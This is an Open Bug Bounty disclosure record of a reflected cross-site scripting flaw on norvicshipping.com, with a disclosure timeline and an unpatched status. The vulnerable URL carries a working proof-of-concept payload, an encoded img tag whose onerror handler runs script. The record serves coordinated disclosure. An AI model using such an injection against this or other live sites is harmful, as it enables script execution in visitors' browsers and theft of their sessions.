norvicshipping.com XSS vulnerability

2016-08-12T15:36:00
ID OBB:173721
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2016-11-04T17:15:00

Description

Vulnerable URL:
http://norvicshipping.com/search-results/?co=q&vi;=1&ty;=31&am;=12&tf;=s5eng2&rc;=7&gi7;=http%3A%2F%2Fwww.allsitesearch.com%2Fals_wpstyle.css&ro;=0&of;=0&ln;=255&ar;=0&mnxs;_dom=http%3A%2F%2Fnorvicshipping.com%2F|&al;=0&sn;=norvicshipping.com&dn;=com&st;=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 10192557
VIP website status:| No
Check norvicshipping.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 August, 2016 15:36 GMT
Vulnerability existence verified and confirmed| 12 August, 2016 17:14 GMT
Generic security notifications sent to website owner| 12 August, 2016 17:14 GMT
Customized security notification sent to website owner| 12 August, 2016 17:14 GMT
Notification sent to subscribers (without technical details)| 12 August, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 4 November, 2016 17:15 GMT